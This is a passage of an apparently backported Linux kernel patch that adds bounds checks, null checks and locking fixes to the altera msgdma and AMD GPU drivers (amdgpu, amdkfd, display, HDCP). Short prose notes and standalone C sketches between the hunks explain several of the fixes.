++	list_move_tail(&desc->node, &mdev->free_list);
+ 	list_for_each_entry_safe(child, next, &desc->tx_list, node) {
+ 		mdev->desc_free_cnt++;
+ 		list_move_tail(&child->node, &mdev->free_list);
+@@ -583,17 +583,16 @@ static void msgdma_issue_pending(struct dma_chan *chan)
+ static void msgdma_chan_desc_cleanup(struct msgdma_device *mdev)
+ {
+ 	struct msgdma_sw_desc *desc, *next;
++	unsigned long irqflags;
+ 
+ 	list_for_each_entry_safe(desc, next, &mdev->done_list, node) {
+ 		struct dmaengine_desc_callback cb;
+ 
+-		list_del(&desc->node);
+-
+ 		dmaengine_desc_get_callback(&desc->async_tx, &cb);
+ 		if (dmaengine_desc_callback_valid(&cb)) {
+-			spin_unlock(&mdev->lock);
++			spin_unlock_irqrestore(&mdev->lock, irqflags);
+ 			dmaengine_desc_callback_invoke(&cb, NULL);
+-			spin_lock(&mdev->lock);
++			spin_lock_irqsave(&mdev->lock, irqflags);
+ 		}
+ 
+ 		/* Run any dependencies, then free the descriptor */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c
+index a4d65973bf7cf..80771b1480fff 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c
+@@ -100,6 +100,7 @@ struct amdgpu_afmt_acr amdgpu_afmt_acr(uint32_t clock)
+ 	amdgpu_afmt_calc_cts(clock, &res.cts_32khz, &res.n_32khz, 32000);
+ 	amdgpu_afmt_calc_cts(clock, &res.cts_44_1khz, &res.n_44_1khz, 44100);
+ 	amdgpu_afmt_calc_cts(clock, &res.cts_48khz, &res.n_48khz, 48000);
++	res.clock = clock;
+ 
+ 	return res;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c
+index 9ba4817a91484..816014ea53817 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c
+@@ -1476,6 +1476,8 @@ int amdgpu_atombios_init_mc_reg_table(struct amdgpu_device *adev,
+ 										(u32)le32_to_cpu(*((u32 *)reg_data + j));
+ 									j++;
+ 								} else if ((reg_table->mc_reg_address[i].pre_reg_data & LOW_NIBBLE_MASK) == DATA_EQU_PREV) {
++									if (i == 0)
++										continue;
+ 									reg_table->mc_reg_table_entry[num_ranges].mc_data[i] =
+ 										reg_table->mc_reg_table_entry[num_ranges].mc_data[i - 1];
+ 								}
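
This guard, like the matching one in ppatomctrl.c further down in the patch,
protects the DATA_EQU_PREV case, which copies mc_data[i - 1] and would read
one element before the array when i == 0. The shape of the bug, reduced to a
standalone sketch with a hypothetical array:

    #include <stdio.h>

    int main(void)
    {
            int mc_data[4] = { 0 };
            int i = 0;

            /* Unguarded, mc_data[i - 1] is mc_data[-1]: an out-of-bounds
             * read (undefined behavior). The fix skips the copy at i == 0.
             */
            if (i > 0)
                    mc_data[i] = mc_data[i - 1];

            printf("mc_data[0]=%d\n", mc_data[0]);
            return 0;
    }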
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c
+index f1a0503791905..682de88cf91f7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c
+@@ -213,6 +213,9 @@ static int amdgpu_cgs_get_firmware_info(struct cgs_device *cgs_device,
+ 		struct amdgpu_firmware_info *ucode;
+ 
+ 		id = fw_type_convert(cgs_device, type);
++		if (id >= AMDGPU_UCODE_ID_MAXIMUM)
++			return -EINVAL;
++
+ 		ucode = &adev->firmware.ucode[id];
+ 		if (ucode->fw == NULL)
+ 			return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 4d1c2eb63090f..1d0f6628f1d69 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4560,7 +4560,8 @@ static int amdgpu_device_recover_vram(struct amdgpu_device *adev)
+ 		shadow = vmbo->shadow;
+ 
+ 		/* No need to recover an evicted BO */
+-		if (shadow->tbo.resource->mem_type != TTM_PL_TT ||
++		if (!shadow->tbo.resource ||
++		    shadow->tbo.resource->mem_type != TTM_PL_TT ||
+ 		    shadow->tbo.resource->start == AMDGPU_BO_INVALID_OFFSET ||
+ 		    shadow->parent->tbo.resource->mem_type != TTM_PL_VRAM)
+ 			continue;
+@@ -5390,7 +5391,7 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ 	 * to put adev in the 1st position.
+ 	 */
+ 	INIT_LIST_HEAD(&device_list);
+-	if (!amdgpu_sriov_vf(adev) && (adev->gmc.xgmi.num_physical_nodes > 1)) {
++	if (!amdgpu_sriov_vf(adev) && (adev->gmc.xgmi.num_physical_nodes > 1) && hive) {
+ 		list_for_each_entry(tmp_adev, &hive->device_list, gmc.xgmi.head) {
+ 			list_add_tail(&tmp_adev->reset_list, &device_list);
+ 			if (gpu_reset_for_dev_remove && adev->shutdown)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+index d6c4293829aab..3e4912f1f92af 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+@@ -179,7 +179,7 @@ static int __amdgpu_eeprom_xfer(struct i2c_adapter *i2c_adap, u32 eeprom_addr,
+  * Returns the number of bytes read/written; -errno on error.
+  */
+ static int amdgpu_eeprom_xfer(struct i2c_adapter *i2c_adap, u32 eeprom_addr,
+-			      u8 *eeprom_buf, u16 buf_size, bool read)
++			      u8 *eeprom_buf, u32 buf_size, bool read)
+ {
+ 	const struct i2c_adapter_quirks *quirks = i2c_adap->quirks;
+ 	u16 limit;
+@@ -226,7 +226,7 @@ static int amdgpu_eeprom_xfer(struct i2c_adapter *i2c_adap, u32 eeprom_addr,
+ 
+ int amdgpu_eeprom_read(struct i2c_adapter *i2c_adap,
+ 		       u32 eeprom_addr, u8 *eeprom_buf,
+-		       u16 bytes)
++		       u32 bytes)
+ {
+ 	return amdgpu_eeprom_xfer(i2c_adap, eeprom_addr, eeprom_buf, bytes,
+ 				  true);
+@@ -234,7 +234,7 @@ int amdgpu_eeprom_read(struct i2c_adapter *i2c_adap,
+ 
+ int amdgpu_eeprom_write(struct i2c_adapter *i2c_adap,
+ 			u32 eeprom_addr, u8 *eeprom_buf,
+-			u16 bytes)
++			u32 bytes)
+ {
+ 	return amdgpu_eeprom_xfer(i2c_adap, eeprom_addr, eeprom_buf, bytes,
+ 				  false);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h
+index 6935adb2be1f1..8083b8253ef43 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.h
+@@ -28,10 +28,10 @@
+ 
+ int amdgpu_eeprom_read(struct i2c_adapter *i2c_adap,
+ 		       u32 eeprom_addr, u8 *eeprom_buf,
+-		       u16 bytes);
++		       u32 bytes);
+ 
+ int amdgpu_eeprom_write(struct i2c_adapter *i2c_adap,
+ 			u32 eeprom_addr, u8 *eeprom_buf,
+-			u16 bytes);
++			u32 bytes);
+ 
+ #endif
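
Widening the byte-count parameter from u16 to u32 avoids silent truncation
once a caller asks for 64 KiB or more in one transfer. A standalone sketch of
the failure mode, using an invented size:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
            uint32_t requested = 70000;              /* invented large read */
            uint16_t truncated = (uint16_t)requested;

            /* 70000 % 65536 == 4464: the old u16 parameter would silently
             * transfer far fewer bytes than the caller asked for.
             */
            printf("requested=%u, seen by callee=%u\n", requested, truncated);
            return 0;
    }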
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 8764ff7ed97e0..f8740ad08af41 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1297,6 +1297,9 @@ static void psp_xgmi_reflect_topology_info(struct psp_context *psp,
+ 	uint8_t dst_num_links = node_info.num_links;
+ 
+ 	hive = amdgpu_get_xgmi_hive(psp->adev);
++	if (WARN_ON(!hive))
++		return;
++
+ 	list_for_each_entry(mirror_adev, &hive->device_list, gmc.xgmi.head) {
+ 		struct psp_xgmi_topology_info *mirror_top_info;
+ 		int j;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+index 296b2d5976af7..cb73d06e1d38d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ring.c
+@@ -324,7 +324,7 @@ int amdgpu_ring_init(struct amdgpu_device *adev, struct amdgpu_ring *ring,
+ 	ring->max_dw = max_dw;
+ 	ring->hw_prio = hw_prio;
+ 
+-	if (!ring->no_scheduler) {
++	if (!ring->no_scheduler && ring->funcs->type < AMDGPU_HW_IP_NUM) {
+ 		hw_ip = ring->funcs->type;
+ 		num_sched = &adev->gpu_sched[hw_ip][hw_prio].num_scheds;
+ 		adev->gpu_sched[hw_ip][hw_prio].sched[(*num_sched)++] =
+@@ -434,8 +434,9 @@ static ssize_t amdgpu_debugfs_ring_read(struct file *f, char __user *buf,
+ 					size_t size, loff_t *pos)
+ {
+ 	struct amdgpu_ring *ring = file_inode(f)->i_private;
+-	int r, i;
+ 	uint32_t value, result, early[3];
++	loff_t i;
++	int r;
+ 
+ 	if (*pos & 3 || size & 3)
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index 5ee9211c503c4..af50e6ce39e17 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -604,7 +604,7 @@ static int amdgpu_virt_write_vf2pf_data(struct amdgpu_device *adev)
+ 	vf2pf_info->dummy_page_addr = (uint64_t)adev->dummy_page_addr;
+ 	vf2pf_info->checksum =
+ 		amd_sriov_msg_checksum(
+-		vf2pf_info, vf2pf_info->header.size, 0, 0);
++		vf2pf_info, sizeof(*vf2pf_info), 0, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/df_v1_7.c b/drivers/gpu/drm/amd/amdgpu/df_v1_7.c
+index b991609f46c10..d4909ee97cd21 100644
+--- a/drivers/gpu/drm/amd/amdgpu/df_v1_7.c
++++ b/drivers/gpu/drm/amd/amdgpu/df_v1_7.c
+@@ -70,6 +70,8 @@ static u32 df_v1_7_get_hbm_channel_number(struct amdgpu_device *adev)
+ 	int fb_channel_number;
+ 
+ 	fb_channel_number = adev->df.funcs->get_fb_channel_number(adev);
++	if (fb_channel_number >= ARRAY_SIZE(df_v1_7_channel_number))
++		fb_channel_number = 0;
+ 
+ 	return df_v1_7_channel_number[fb_channel_number];
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c
+index 19455a7259391..7679a4cd55c05 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_4.c
+@@ -384,7 +384,7 @@ static void nbio_v7_4_handle_ras_controller_intr_no_bifring(struct amdgpu_device
+ 		else
+ 			WREG32_SOC15(NBIO, 0, mmBIF_DOORBELL_INT_CNTL, bif_doorbell_intr_cntl);
+ 
+-		if (!ras->disable_ras_err_cnt_harvest) {
++		if (ras && !ras->disable_ras_err_cnt_harvest && obj) {
+ 			/*
+ 			 * clear error status after ras_controller_intr
+ 			 * according to hw team and count ue number
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+index a8671061a175a..bf90a64798675 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+@@ -43,8 +43,6 @@
+ #define CRAT_OEMTABLEID_LENGTH	8
+ #define CRAT_RESERVED_LENGTH	6
+ 
+-#define CRAT_OEMID_64BIT_MASK ((1ULL << (CRAT_OEMID_LENGTH * 8)) - 1)
+-
+ /* Compute Unit flags */
+ #define COMPUTE_UNIT_CPU	(1 << 0)  /* Create Virtual CRAT for CPU */
+ #define COMPUTE_UNIT_GPU	(1 << 1)  /* Create Virtual CRAT for GPU */
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 029916971bf66..d841200a405b5 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -972,8 +972,7 @@ static void kfd_update_system_properties(void)
+ 	dev = list_last_entry(&topology_device_list,
+ 			struct kfd_topology_device, list);
+ 	if (dev) {
+-		sys_props.platform_id =
+-			(*((uint64_t *)dev->oem_id)) & CRAT_OEMID_64BIT_MASK;
++		sys_props.platform_id = dev->oem_id64;
+ 		sys_props.platform_oem = *((uint64_t *)dev->oem_table_id);
+ 		sys_props.platform_rev = dev->oem_revision;
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+index 19283b8b16884..00a78c2ce6862 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+@@ -146,7 +146,10 @@ struct kfd_topology_device {
+ 	struct attribute		attr_gpuid;
+ 	struct attribute		attr_name;
+ 	struct attribute		attr_props;
+-	uint8_t				oem_id[CRAT_OEMID_LENGTH];
++	union {
++		uint8_t				oem_id[CRAT_OEMID_LENGTH];
++		uint64_t			oem_id64;
++	};
+ 	uint8_t				oem_table_id[CRAT_OEMTABLEID_LENGTH];
+ 	uint32_t			oem_revision;
+ };
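
The anonymous union gives the KFD code an aligned 64-bit view of the eight
oem_id bytes, replacing the pointer cast plus CRAT_OEMID_64BIT_MASK dance
removed earlier in this patch. The idiom, reduced to a standalone sketch with
illustrative types:

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    struct topo {
            union {
                    uint8_t  oem_id[8];
                    uint64_t oem_id64;
            };
    };

    int main(void)
    {
            struct topo t;

            memcpy(t.oem_id, "ABCDEFGH", 8);

            /* One aligned load instead of *(uint64_t *)t.oem_id & mask;
             * byte order follows host endianness, same as before.
             */
            printf("platform_id=0x%016llx\n",
                   (unsigned long long)t.oem_id64);
            return 0;
    }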
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 6189685af1fda..0be1a1149a3fe 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4359,7 +4359,10 @@ static int amdgpu_dm_initialize_drm_device(struct amdgpu_device *adev)
+ 
+ 	/* There is one primary plane per CRTC */
+ 	primary_planes = dm->dc->caps.max_streams;
+-	ASSERT(primary_planes <= AMDGPU_MAX_PLANES);
++	if (primary_planes > AMDGPU_MAX_PLANES) {
++		DRM_ERROR("DM: Plane nums out of 6 planes\n");
++		return -EINVAL;
++	}
+ 
+ 	/*
+ 	 * Initialize primary planes, implicit planes for legacy IOCTLS.
+@@ -8052,15 +8055,13 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				bundle->stream_update.vrr_infopacket =
+ 					&acrtc_state->stream->vrr_infopacket;
+ 		}
+-	} else if (cursor_update && acrtc_state->active_planes > 0 &&
+-		   acrtc_attach->base.state->event) {
+-		drm_crtc_vblank_get(pcrtc);
+-
++	} else if (cursor_update && acrtc_state->active_planes > 0) {
+ 		spin_lock_irqsave(&pcrtc->dev->event_lock, flags);
+-
+-		acrtc_attach->event = acrtc_attach->base.state->event;
+-		acrtc_attach->base.state->event = NULL;
+-
++		if (acrtc_attach->base.state->event) {
++			drm_crtc_vblank_get(pcrtc);
++			acrtc_attach->event = acrtc_attach->base.state->event;
++			acrtc_attach->base.state->event = NULL;
++		}
+ 		spin_unlock_irqrestore(&pcrtc->dev->event_lock, flags);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+index 2c9a33c80c818..df18b4df1f2c1 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+@@ -49,7 +49,7 @@
+ 
+ #define AMDGPU_DM_MAX_NUM_EDP 2
+ 
+-#define AMDGPU_DMUB_NOTIFICATION_MAX 5
++#define AMDGPU_DMUB_NOTIFICATION_MAX 6
+ 
+ /*
+ #include "include/amdgpu_dal_power_if.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c
+index ca6dfd2d7561f..35386011c56c8 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr.c
+@@ -484,7 +484,8 @@ static void build_watermark_ranges(struct clk_bw_params *bw_params, struct pp_sm
+ 			ranges->reader_wm_sets[num_valid_sets].max_fill_clk_mhz = PP_SMU_WM_SET_RANGE_CLK_UNCONSTRAINED_MAX;
+ 
+ 			/* Modify previous watermark range to cover up to max */
+-			ranges->reader_wm_sets[num_valid_sets - 1].max_fill_clk_mhz = PP_SMU_WM_SET_RANGE_CLK_UNCONSTRAINED_MAX;
++			if (num_valid_sets > 0)
++				ranges->reader_wm_sets[num_valid_sets - 1].max_fill_clk_mhz = PP_SMU_WM_SET_RANGE_CLK_UNCONSTRAINED_MAX;
+ 		}
+ 		num_valid_sets++;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index f415733f1a979..d7bca680805d3 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1265,6 +1265,7 @@ struct dc *dc_create(const struct dc_init_data *init_params)
+ 		return NULL;
+ 
+ 	if (init_params->dce_environment == DCE_ENV_VIRTUAL_HW) {
++		dc->caps.linear_pitch_alignment = 64;
+ 		if (!dc_construct_ctx(dc, init_params))
+ 			goto destruct_dc;
+ 	} else {
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index 83898e46bcadf..29400db42bb2d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -3629,6 +3629,9 @@ void resource_build_bit_depth_reduction_params(struct dc_stream_state *stream,
+ 
+ enum dc_status dc_validate_stream(struct dc *dc, struct dc_stream_state *stream)
+ {
++	if (dc == NULL || stream == NULL)
++		return DC_ERROR_UNEXPECTED;
++
+ 	struct dc_link *link = stream->link;
+ 	struct timing_generator *tg = dc->res_pool->timing_generators[0];
+ 	enum dc_status res = DC_OK;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c
+index 994fb732a7cb7..a0d437f0ce2ba 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dwb_scl.c
+@@ -690,6 +690,9 @@ static void wbscl_set_scaler_filter(
+ 	int pair;
+ 	uint16_t odd_coef, even_coef;
+ 
++	if (!filter)
++		return;
++
+ 	for (phase = 0; phase < (NUM_PHASES / 2 + 1); phase++) {
+ 		for (pair = 0; pair < tap_pairs; pair++) {
+ 			even_coef = filter[phase * taps + 2 * pair];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c b/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c
+index e73f089c84bb6..ebd7ed1b9a3cd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/calcs/dcn_calcs.c
+@@ -1453,10 +1453,9 @@ void dcn_bw_update_from_pplib_fclks(
+ 	ASSERT(fclks->num_levels);
+ 
+ 	vmin0p65_idx = 0;
+-	vmid0p72_idx = fclks->num_levels -
+-		(fclks->num_levels > 2 ? 3 : (fclks->num_levels > 1 ? 2 : 1));
+-	vnom0p8_idx = fclks->num_levels - (fclks->num_levels > 1 ? 2 : 1);
+-	vmax0p9_idx = fclks->num_levels - 1;
++	vmid0p72_idx = fclks->num_levels > 2 ? fclks->num_levels - 3 : 0;
++	vnom0p8_idx = fclks->num_levels > 1 ? fclks->num_levels - 2 : 0;
++	vmax0p9_idx = fclks->num_levels > 0 ? fclks->num_levels - 1 : 0;
+ 
+ 	dc->dcn_soc->fabric_and_dram_bandwidth_vmin0p65 =
+ 		32 * (fclks->data[vmin0p65_idx].clocks_in_khz / 1000.0) / 1000.0;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+index 1070cf8701960..b2ad56c459ba6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+@@ -1099,8 +1099,13 @@ void ModeSupportAndSystemConfiguration(struct display_mode_lib *mode_lib)
+ 
+ 	// Total Available Pipes Support Check
+ 	for (k = 0; k < mode_lib->vba.NumberOfActivePlanes; ++k) {
+-		total_pipes += mode_lib->vba.DPPPerPlane[k];
+ 		pipe_idx = get_pipe_idx(mode_lib, k);
++		if (pipe_idx == -1) {
++			ASSERT(0);
++			continue; // skip inactive planes
++		}
++		total_pipes += mode_lib->vba.DPPPerPlane[k];
++
+ 		if (mode_lib->vba.cache_pipes[pipe_idx].clks_cfg.dppclk_mhz > 0.0)
+ 			mode_lib->vba.DPPCLK[k] = mode_lib->vba.cache_pipes[pipe_idx].clks_cfg.dppclk_mhz;
+ 		else
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c b/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c
+index 3ede6e02c3a78..f2037d78f71ab 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/gpio_service.c
+@@ -56,7 +56,7 @@ struct gpio_service *dal_gpio_service_create(
+ 	struct dc_context *ctx)
+ {
+ 	struct gpio_service *service;
+-	uint32_t index_of_id;
++	int32_t index_of_id;
+ 
+ 	service = kzalloc(sizeof(struct gpio_service), GFP_KERNEL);
+ 
+@@ -112,7 +112,7 @@ struct gpio_service *dal_gpio_service_create(
+ 	return service;
+ 
+ failure_2:
+-	while (index_of_id) {
++	while (index_of_id > 0) {
+ 		--index_of_id;
+ 		kfree(service->busyness[index_of_id]);
+ 	}
+@@ -239,6 +239,9 @@ static bool is_pin_busy(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
++	if (id == GPIO_ID_UNKNOWN)
++		return false;
++
+ 	return service->busyness[id][en];
+ }
+ 
+@@ -247,6 +250,9 @@ static void set_pin_busy(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
++	if (id == GPIO_ID_UNKNOWN)
++		return;
++
+ 	service->busyness[id][en] = true;
+ }
+ 
+@@ -255,6 +261,9 @@ static void set_pin_free(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
++	if (id == GPIO_ID_UNKNOWN)
++		return;
++
+ 	service->busyness[id][en] = false;
+ }
+ 
+@@ -263,7 +272,7 @@ enum gpio_result dal_gpio_service_lock(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
+-	if (!service->busyness[id]) {
++	if (id != GPIO_ID_UNKNOWN && !service->busyness[id]) {
+ 		ASSERT_CRITICAL(false);
+ 		return GPIO_RESULT_OPEN_FAILED;
+ 	}
+@@ -277,7 +286,7 @@ enum gpio_result dal_gpio_service_unlock(
+ 	enum gpio_id id,
+ 	uint32_t en)
+ {
+-	if (!service->busyness[id]) {
++	if (id != GPIO_ID_UNKNOWN && !service->busyness[id]) {
+ 		ASSERT_CRITICAL(false);
+ 		return GPIO_RESULT_OPEN_FAILED;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c b/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c
+index 4233955e3c47b..c9851492ec84a 100644
+--- a/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c
++++ b/drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c
+@@ -131,13 +131,21 @@ static bool hdmi_14_process_transaction(
+ 	const uint8_t hdcp_i2c_addr_link_primary = 0x3a; /* 0x74 >> 1*/
+ 	const uint8_t hdcp_i2c_addr_link_secondary = 0x3b; /* 0x76 >> 1*/
+ 	struct i2c_command i2c_command;
+-	uint8_t offset = hdcp_i2c_offsets[message_info->msg_id];
++	uint8_t offset;
+ 	struct i2c_payload i2c_payloads[] = {
+-		{ true, 0, 1, &offset },
++		{ true, 0, 1, 0 },
+ 		/* actual hdcp payload, will be filled later, zeroed for now*/
+ 		{ 0 }
+ 	};
+ 
++	if (message_info->msg_id == HDCP_MESSAGE_ID_INVALID) {
++		DC_LOG_ERROR("%s: Invalid message_info msg_id - %d\n", __func__, message_info->msg_id);
++		return false;
++	}
++
++	offset = hdcp_i2c_offsets[message_info->msg_id];
++	i2c_payloads[0].data = &offset;
++
+ 	switch (message_info->link) {
+ 	case HDCP_LINK_SECONDARY:
+ 		i2c_payloads[0].address = hdcp_i2c_addr_link_secondary;
+@@ -311,6 +319,11 @@ static bool dp_11_process_transaction(
+ 	struct dc_link *link,
+ 	struct hdcp_protection_message *message_info)
+ {
++	if (message_info->msg_id == HDCP_MESSAGE_ID_INVALID) {
++		DC_LOG_ERROR("%s: Invalid message_info msg_id - %d\n", __func__, message_info->msg_id);
++		return false;
++	}
++
+ 	return dpcd_access_helper(
+ 		link,
+ 		message_info->length,
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+index 8e9caae7c9559..1b2df97226a3f 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+@@ -156,11 +156,16 @@ static enum mod_hdcp_status read(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
+-	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID ||
++		msg_id >= MOD_HDCP_MESSAGE_ID_MAX)
+ 		return MOD_HDCP_STATUS_DDC_FAILURE;
+-	}
+ 
+ 	if (is_dp_hdcp(hdcp)) {
++		int num_dpcd_addrs = sizeof(hdcp_dpcd_addrs) /
++			sizeof(hdcp_dpcd_addrs[0]);
++		if (msg_id >= num_dpcd_addrs)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+ 			success = hdcp->config.ddc.funcs.read_dpcd(hdcp->config.ddc.handle,
+@@ -175,6 +180,11 @@ static enum mod_hdcp_status read(struct mod_hdcp *hdcp,
+ 			data_offset += cur_size;
+ 		}
+ 	} else {
++		int num_i2c_offsets = sizeof(hdcp_i2c_offsets) /
++			sizeof(hdcp_i2c_offsets[0]);
++		if (msg_id >= num_i2c_offsets)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		success = hdcp->config.ddc.funcs.read_i2c(
+ 				hdcp->config.ddc.handle,
+ 				HDCP_I2C_ADDR,
+@@ -219,11 +229,16 @@ static enum mod_hdcp_status write(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
+-	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID ||
++		msg_id >= MOD_HDCP_MESSAGE_ID_MAX)
+ 		return MOD_HDCP_STATUS_DDC_FAILURE;
+-	}
+ 
+ 	if (is_dp_hdcp(hdcp)) {
++		int num_dpcd_addrs = sizeof(hdcp_dpcd_addrs) /
++			sizeof(hdcp_dpcd_addrs[0]);
++		if (msg_id >= num_dpcd_addrs)
